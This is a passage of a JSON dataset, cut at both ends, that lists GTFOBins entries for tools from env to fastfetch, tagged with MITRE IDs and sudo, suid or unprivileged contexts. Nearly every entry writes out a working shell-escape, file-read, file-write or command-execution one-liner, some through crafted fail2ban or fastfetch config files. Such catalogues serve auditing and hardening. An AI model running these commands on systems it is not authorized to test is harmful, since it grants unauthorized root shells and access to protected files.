>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:sudo","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:suid","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:unprivileged","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:sudo","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:suid","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:unprivileged","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:sudo","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:suid","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:unprivileged","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-read:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-read:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:1:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:1:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:2:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:2:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:3:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:3:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:inherit:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:inherit:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:sudo","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:suid","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:unprivileged","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh -p;interact'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:0:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:0:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:1:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:1:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fail2ban-client:command:0:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fail2ban-client add x\nfail2ban-client set x addaction x\nfail2ban-client set x action x actionban /path/to/command\nfail2ban-client start x\nfail2ban-client set x banip 999.999.999.999\nfail2ban-client set x unbanip 999.999.999.999\nfail2ban-client stop x","description":"The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess. The `banip` command will hang until the subprocess returns.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fail2ban-client:command:1:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-dir/fail2ban.conf <<EOF\n[Definition]\nEOF\n\ncat >/path/to/temp-dir/jail.local <<EOF\n[x]\nenabled = true\naction = x\nEOF\n\nmkdir -p /path/to/temp-dir/action.d/\ncat >/path/to/temp-dir/action.d/x.conf <<EOF\n[Definition]\nactionstart = /path/to/command\nEOF\n\nmkdir -p /path/to/temp-dir/filter.d/\ncat >/path/to/temp-dir/filter.d/x.conf <<EOF\n[Definition]\nEOF\n\nfail2ban-client -c /path/to/temp-dir/ -v restart","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 